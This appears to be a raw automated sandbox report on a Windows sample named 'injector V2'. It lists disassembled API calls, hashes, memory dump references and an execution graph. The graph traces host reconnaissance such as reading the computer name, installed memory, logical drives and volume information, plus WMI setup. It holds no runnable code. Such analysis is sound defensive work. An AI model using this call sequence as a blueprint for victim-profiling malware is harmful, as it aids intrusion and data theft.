                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 6f8fca6ad2f3179b0b54b2877ee10a3b70c69d340c6c17e96a0a5d71d74f0a51
                                                                          • Instruction ID: 934280ff25b276e832d757a1e2dee35f7571ae6b6b6de95d3ae1ee7b91886bee
                                                                          • Opcode Fuzzy Hash: 6f8fca6ad2f3179b0b54b2877ee10a3b70c69d340c6c17e96a0a5d71d74f0a51
                                                                          • Instruction Fuzzy Hash: 09018F3194461AABDB018F50DC09FEEB7FAFB04B51F084526F811E23D0DB749900CAA0
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 0060DFA2
                                                                          • __alloca_probe_16.LIBCMT ref: 0060E06B
                                                                          • __freea.LIBCMT ref: 0060E0D2
                                                                            • Part of subcall function 0060BC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006041E0,?,?,00601007,?,005FFAB5), ref: 0060BC77
                                                                          • __freea.LIBCMT ref: 0060E0E5
                                                                          • __freea.LIBCMT ref: 0060E0F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1423051803-0
                                                                          • Opcode ID: 4f2a37917a2232237a70fb37191c0dd5b5db7f197796d3f3067b2bd74a7b7bca
                                                                          • Instruction ID: a52548b5d6c2f01204a3c199645b9b2452c4b9245e58dcd40324dece409201a4
                                                                          • Opcode Fuzzy Hash: 4f2a37917a2232237a70fb37191c0dd5b5db7f197796d3f3067b2bd74a7b7bca
                                                                          • Instruction Fuzzy Hash: 9A519372680226ABEB295F60CC41EFB76ABEF44710B15492DF916D6381FB72CC60C664
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006093FE,?,?,00000000,00000000,00000000,?), ref: 0060951D
                                                                          • CatchIt.LIBVCRUNTIME ref: 00609603
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CatchEncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 1435073870-2084237596
                                                                          • Opcode ID: c186e361e11ea8090526556bb80e83adc748b5ceb3f84762871363c06ccb755c
                                                                          • Instruction ID: ba8aeba0b1b3876b7261d5ddc1a286bc4deb715d493b145df7f8d08dace7767c
                                                                          • Opcode Fuzzy Hash: c186e361e11ea8090526556bb80e83adc748b5ceb3f84762871363c06ccb755c
                                                                          • Instruction Fuzzy Hash: 32414771940209AFDF1ADF94CC81AEEBBB7EF48300F188099F905A7292D7369950DB60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0060DCFA,00000000,?,0061CCD0,?,?,?,0060DC31,00000004,InitializeCriticalSectionEx,006146F8,00614700), ref: 0060DC6B
                                                                          • GetLastError.KERNEL32(?,0060DCFA,00000000,?,0061CCD0,?,?,?,0060DC31,00000004,InitializeCriticalSectionEx,006146F8,00614700,00000000,?,0060971C), ref: 0060DC75
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0060DC9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: 52f98306c4187fed848710758ff9e62fe9ce612b16c56e0ad12ed772dd94fbb0
                                                                          • Instruction ID: 5af42f180c4baa0eef4ff5e1f96e0d9cae143db4e2e246d3e847dec306b04f08
                                                                          • Opcode Fuzzy Hash: 52f98306c4187fed848710758ff9e62fe9ce612b16c56e0ad12ed772dd94fbb0
                                                                          • Instruction Fuzzy Hash: 5BE048306C0205BFFF102F91EC0ABD93B9BAB01B58F14C031F90DE81E1EBA29851C554
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(F8F81887,00000000,00000000,?), ref: 0060E64B
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0060E89D
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0060E8E3
                                                                          • GetLastError.KERNEL32 ref: 0060E986
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: b93a32f2cffbab3c386a59e7fcf515bdf8841d8d20c727ee279551ec16ec9962
                                                                          • Instruction ID: 195f73ff93b442b7bd33aeb10f4f37efa412dec202d68ce58d5f88803c0d8bec
                                                                          • Opcode Fuzzy Hash: b93a32f2cffbab3c386a59e7fcf515bdf8841d8d20c727ee279551ec16ec9962
                                                                          • Instruction Fuzzy Hash: 80D18C75D402589FCF19CFA8D8809EEFBB6FF08314F18456AE456EB391D631A942CB50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: 6eee7fb56b216741d9e254beb93fa7d325fca87011add5b8bf6201ed1bef704a
                                                                          • Instruction ID: f739e72823b57d1503d00052262eb998e66a82a9cedbc8fc65eee28e5bd85988
                                                                          • Opcode Fuzzy Hash: 6eee7fb56b216741d9e254beb93fa7d325fca87011add5b8bf6201ed1bef704a
                                                                          • Instruction Fuzzy Hash: 5B51B071685602AFDB2D8F24C841BAB77A7FF40350F14452DE9469B2E2EB31EC41CBA4
                                                                          APIs
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • GetLastError.KERNEL32 ref: 0060C61C
                                                                          • __dosmaperr.LIBCMT ref: 0060C623
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0060C65D
                                                                          • __dosmaperr.LIBCMT ref: 0060C664
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1913693674-0
                                                                          • Opcode ID: 4bd68b3a4c68cf0d323fcb42aa060372e80fa2adf96f9471f8420741abcacb81
                                                                          • Instruction ID: 71767a91d749248ddbebb3da48120a618fe5663b58ebe69ddb97bc7d09a22416
                                                                          • Opcode Fuzzy Hash: 4bd68b3a4c68cf0d323fcb42aa060372e80fa2adf96f9471f8420741abcacb81
                                                                          • Instruction Fuzzy Hash: 4421D371280205AFCB28AF618C8096BB7ABEF443747109728F815932D1D731EC019B94
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0060D235
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060D26D
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060D28D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 158306478-0
                                                                          • Opcode ID: 91577003814281f6a0875950321e2b15ff1696f2c67446b39879fda7d15e4814
                                                                          • Instruction ID: f0cf7ff27ea5f247c0e54117a9cef729360b3b57976ae2fca76e139fdcc55ffd
                                                                          • Opcode Fuzzy Hash: 91577003814281f6a0875950321e2b15ff1696f2c67446b39879fda7d15e4814
                                                                          • Instruction Fuzzy Hash: 921104B15411197EE72927F15C8ACEF79AFCE943A47141629FA02D2181FF20CE024174
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000), ref: 006107D7
                                                                          • GetLastError.KERNEL32(?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?,?,?,0060E320,00000000), ref: 006107E3
                                                                            • Part of subcall function 00610840: CloseHandle.KERNEL32(FFFFFFFE,006107F3,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?,?), ref: 00610850
                                                                          • ___initconout.LIBCMT ref: 006107F3
                                                                            • Part of subcall function 00610815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006107B1,0060FF1E,?,?,0060E9DA,?,00000000,00000000,?), ref: 00610828
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?), ref: 00610808
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: d7211ebf9c72c28cf54ea0a2a6c7d54fbe707ac9dc50cfad985b0a869f1b6ee2
                                                                          • Instruction ID: b35eae0503a31cd1025018715329e1089a0362180c556f35c69b37157bc1383d
                                                                          • Opcode Fuzzy Hash: d7211ebf9c72c28cf54ea0a2a6c7d54fbe707ac9dc50cfad985b0a869f1b6ee2
                                                                          • Instruction Fuzzy Hash: 27F01C36500118BBCF621F91DC089CA3F6BFF087A1F08D422FA1885121C6B288A1ABE4
                                                                          APIs
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00608D75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ___except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3493665558-3733052814
                                                                          • Opcode ID: a2330c4953a6710867f3c41d4b5234be1d3c65fe3bd1fc86572a63473baf3f7a
                                                                          • Instruction ID: 8b11afee77661924a0d05a3521388727417116ef2c97fae35163a1d6175c0f07
                                                                          • Opcode Fuzzy Hash: a2330c4953a6710867f3c41d4b5234be1d3c65fe3bd1fc86572a63473baf3f7a
                                                                          • Instruction Fuzzy Hash: CF31D276480215EFCF2ADF50C8048EB7B27FF18354B18865AF9844B2A1CB32DDA1DB81
                                                                          APIs
                                                                            • Part of subcall function 00604533: __EH_prolog3_GS.LIBCMT ref: 0060453A
                                                                          • std::domain_error::domain_error.LIBCPMT ref: 006045EC
                                                                            • Part of subcall function 006043A4: std::exception::exception.LIBCONCRT ref: 006043BA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                          • String ID: CD`$CD`
                                                                          • API String ID: 2144476180-1617366341
                                                                          • Opcode ID: e3ca4566c9226ca9d6f969d0b3b34cd4b25045c7600e31d89021511d36e7f843
                                                                          • Instruction ID: 9fc4a7262d7bf4f98f76d5520bb6271170cf9d2da23b0abeed1232c22c1929e3
                                                                          • Opcode Fuzzy Hash: e3ca4566c9226ca9d6f969d0b3b34cd4b25045c7600e31d89021511d36e7f843
                                                                          • Instruction Fuzzy Hash: 7C011EB0E00218ABCF18EF69D8458AFBBFAFF88704B50851EE81597341DB74DA15CB94

                                                                          Execution Graph

                                                                          Execution Coverage:6.8%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:52.7%
                                                                          Total number of Nodes:296
                                                                          Total number of Limit Nodes:27
                                                                          execution_graph 19605 40d320 19606 40d340 19605->19606 19609 43aae0 19606->19609 19608 40d378 19608->19608 19611 43ab40 CoCreateInstance 19609->19611 19612 43afb5 19611->19612 19613 43abea SysAllocString 19611->19613 19615 43afc5 GetVolumeInformationW 19612->19615 19616 43ac77 19613->19616 19623 43afdc 19615->19623 19617 43afa1 SysFreeString 19616->19617 19618 43ac7f CoSetProxyBlanket 19616->19618 19617->19612 19619 43af97 19618->19619 19620 43ac9f SysAllocString 19618->19620 19619->19617 19622 43ad80 19620->19622 19622->19622 19624 43ad94 SysAllocString 19622->19624 19623->19608 19627 43adb7 19624->19627 19625 43af81 SysFreeString SysFreeString 19625->19619 19626 43af77 19626->19625 19627->19625 19627->19626 19628 43adfb VariantInit 19627->19628 19630 43ae60 19628->19630 19629 43af66 VariantClear 19629->19626 19630->19629 19631 4241a0 19632 4241f0 19631->19632 19633 4241ae 19631->19633 19637 4242b0 19633->19637 19638 4242c0 19637->19638 19638->19638 19639 442530 LdrInitializeThunk 19638->19639 19640 42439f 19639->19640 19641 40d2e3 CoInitializeSecurity 19642 4325a0 CoSetProxyBlanket 19395 443580 19396 44358f 19395->19396 19399 44366e 19396->19399 19403 43fac0 LdrInitializeThunk 19396->19403 19397 443861 19399->19397 19401 4437ae 19399->19401 19404 43fac0 LdrInitializeThunk 19399->19404 19405 43d1b0 19401->19405 19403->19399 19404->19401 19406 43d256 19405->19406 19407 43d24a RtlFreeHeap 19405->19407 19408 43d1c4 19405->19408 19406->19397 19407->19406 19408->19407 19409 42ef87 19410 42ef91 19409->19410 19411 42f0a5 GetPhysicallyInstalledSystemMemory 19410->19411 19412 42f0c9 19411->19412 19412->19412 19413 40da8d 19414 40da93 19413->19414 19415 40daa2 CoUninitialize 19414->19415 19416 40dae0 19415->19416 19649 42f3ed 19655 441930 19649->19655 19652 42f450 GetComputerNameExA 19654 42f560 19652->19654 19656 42f3fd GetComputerNameExA 19655->19656 19656->19652 19417 40ad50 19420 40ad90 19417->19420 19418 40b094 19419 43d1b0 RtlFreeHeap 19419->19418 19420->19418 19420->19419 19657 408c70 19658 408c7f 19657->19658 19659 408e47 ExitProcess 19658->19659 19660 408c87 SHGetSpecialFolderPathW 19658->19660 19661 408c9d 19660->19661 19662 408ca5 GetCurrentThreadId 19661->19662 19663 408e3d 19661->19663 19664 408cc5 GetCurrentProcessId GetForegroundWindow 19662->19664 19663->19659 19666 408da4 19664->19666 19670 40a020 19666->19670 19668 408e31 19668->19663 19669 40d2b0 CoInitializeEx 19668->19669 19669->19663 19671 40a050 19670->19671 19671->19671 19672 40a0e7 LoadLibraryExW 19671->19672 19673 40a0fc 19672->19673 19674 40d6f0 19676 40d710 19674->19676 19675 40d795 19676->19675 19678 43fac0 LdrInitializeThunk 19676->19678 19678->19675 19421 4190d0 19422 4190f0 19421->19422 19422->19422 19437 442370 19422->19437 19424 4191be 19425 4192fb 19424->19425 19426 41928e 19424->19426 19427 41929b 19424->19427 19428 41930c 19424->19428 19434 419346 19424->19434 19436 4192a7 19424->19436 19441 43b0a0 19424->19441 19430 4426f0 LdrInitializeThunk 19425->19430 19426->19425 19426->19427 19426->19428 19432 442370 LdrInitializeThunk 19426->19432 19426->19434 19426->19436 19427->19425 19427->19428 19427->19434 19427->19436 19455 4426f0 19427->19455 19428->19434 19428->19436 19459 4427d0 19428->19459 19430->19428 19432->19427 19434->19436 19465 43fac0 LdrInitializeThunk 19434->19465 19438 442390 19437->19438 19439 4424de 19438->19439 19466 43fac0 LdrInitializeThunk 19438->19466 19439->19424 19442 442370 LdrInitializeThunk 19441->19442 19450 43b0be 19442->19450 19443 43b18f 19448 43d1b0 RtlFreeHeap 19443->19448 19444 43b0cd 19444->19426 19445 43b607 19452 43b195 19448->19452 19449 43d500 LdrInitializeThunk 19451 43b16e 19449->19451 19450->19443 19450->19444 19450->19451 19468 43fac0 LdrInitializeThunk 19450->19468 19451->19443 19451->19445 19451->19449 19469 43d650 19451->19469 19473 43d710 19451->19473 19452->19444 19467 43fac0 LdrInitializeThunk 19452->19467 19457 442720 19455->19457 19456 44277e 19456->19425 19457->19456 19485 43fac0 LdrInitializeThunk 19457->19485 19460 442800 19459->19460 19463 44285e 19460->19463 19486 43fac0 LdrInitializeThunk 19460->19486 19461 44291e 19461->19434 19463->19461 19487 43fac0 LdrInitializeThunk 19463->19487 19465->19436 19466->19439 19467->19444 19468->19451 19470 43d65a 19469->19470 19471 43d6de 19469->19471 19470->19471 19481 43fac0 LdrInitializeThunk 19470->19481 19471->19451 19474 43d7b0 19473->19474 19475 43d72a 19473->19475 19474->19451 19475->19474 19477 43d7ae 19475->19477 19482 43fac0 LdrInitializeThunk 19475->19482 19479 43d8ee 19477->19479 19483 43fac0 LdrInitializeThunk 19477->19483 19479->19474 19484 43fac0 LdrInitializeThunk 19479->19484 19481->19471 19482->19477 19483->19479 19484->19474 19485->19456 19486->19463 19487->19461 19679 40d7f1 19680 40d800 19679->19680 19681 40d88e 19680->19681 19755 43fac0 LdrInitializeThunk 19680->19755 19684 40d95e 19681->19684 19756 43fac0 LdrInitializeThunk 19681->19756 19695 426bd0 19684->19695 19686 40d9cf 19715 426e00 19686->19715 19688 40d9ef 19737 429060 19688->19737 19701 426c70 19695->19701 19696 442f40 2 API calls 19696->19701 19697 426b7d 19697->19686 19698 426d67 19764 422110 19698->19764 19700 426f80 19768 442c40 19700->19768 19701->19696 19701->19697 19701->19698 19701->19700 19704 442b00 LdrInitializeThunk 19707 426fe4 19704->19707 19705 442b00 LdrInitializeThunk 19705->19707 19707->19705 19708 427bb0 19707->19708 19711 428140 19707->19711 19712 427d67 19707->19712 19708->19697 19786 43fac0 LdrInitializeThunk 19708->19786 19713 428234 19711->19713 19784 43fac0 LdrInitializeThunk 19711->19784 19712->19711 19776 443260 19712->19776 19785 43fac0 LdrInitializeThunk 19713->19785 19716 426e10 19715->19716 19717 442b00 LdrInitializeThunk 19716->19717 19720 426d30 19717->19720 19718 442f40 2 API calls 19718->19720 19719 426b7d 19719->19688 19720->19718 19720->19719 19721 426d67 19720->19721 19722 426f80 19720->19722 19723 422110 LdrInitializeThunk 19721->19723 19724 442c40 2 API calls 19722->19724 19723->19719 19725 426fb0 19724->19725 19726 442b00 LdrInitializeThunk 19725->19726 19729 426fe4 19725->19729 19726->19729 19727 442b00 LdrInitializeThunk 19727->19729 19728 443260 2 API calls 19733 427d67 19728->19733 19729->19727 19730 427bb0 19729->19730 19732 428140 19729->19732 19729->19733 19730->19719 19793 43fac0 LdrInitializeThunk 19730->19793 19735 428234 19732->19735 19791 43fac0 LdrInitializeThunk 19732->19791 19733->19728 19733->19732 19733->19733 19792 43fac0 LdrInitializeThunk 19735->19792 19738 429090 19737->19738 19741 4290ee 19738->19741 19794 43fac0 LdrInitializeThunk 19738->19794 19739 40da18 19745 429520 19739->19745 19741->19739 19744 4291ee 19741->19744 19795 43fac0 LdrInitializeThunk 19741->19795 19742 43d1b0 RtlFreeHeap 19742->19739 19744->19742 19796 429540 19745->19796 19755->19681 19756->19684 19767 422120 19764->19767 19765 42222c 19765->19697 19766 442530 LdrInitializeThunk 19766->19765 19767->19765 19767->19766 19769 442c70 19768->19769 19772 442cce 19769->19772 19787 43fac0 LdrInitializeThunk 19769->19787 19770 426fb0 19770->19704 19770->19707 19772->19770 19775 442df3 19772->19775 19788 43fac0 LdrInitializeThunk 19772->19788 19773 43d1b0 RtlFreeHeap 19773->19770 19775->19773 19775->19775 19778 443290 19776->19778 19777 443568 19777->19712 19780 4432ee 19778->19780 19789 43fac0 LdrInitializeThunk 19778->19789 19780->19777 19783 4433be 19780->19783 19790 43fac0 LdrInitializeThunk 19780->19790 19781 43d1b0 RtlFreeHeap 19781->19777 19783->19781 19784->19711 19785->19708 19786->19697 19787->19772 19788->19775 19789->19780 19790->19783 19791->19732 19792->19730 19793->19719 19794->19741 19795->19744 19797 4295b0 19796->19797 19797->19797 19798 43d260 2 API calls 19797->19798 19799 4295e4 19798->19799 19800 43fa30 19801 43fa4a 19800->19801 19803 43fa58 19800->19803 19802 43d1b0 RtlFreeHeap 19801->19802 19801->19803 19802->19803 19493 426618 19494 426620 19493->19494 19502 442530 19494->19502 19496 426791 19497 426917 19496->19497 19499 426a72 19496->19499 19500 426901 GetLogicalDrives 19496->19500 19497->19499 19506 424860 19497->19506 19501 442530 LdrInitializeThunk 19500->19501 19501->19497 19503 442550 19502->19503 19504 44269e 19503->19504 19518 43fac0 LdrInitializeThunk 19503->19518 19504->19496 19507 442370 LdrInitializeThunk 19506->19507 19511 4248a3 19507->19511 19508 4250cd 19508->19499 19509 425045 19512 43d1b0 RtlFreeHeap 19509->19512 19511->19508 19515 42495e 19511->19515 19519 43fac0 LdrInitializeThunk 19511->19519 19513 425055 19512->19513 19513->19508 19521 43fac0 LdrInitializeThunk 19513->19521 19515->19509 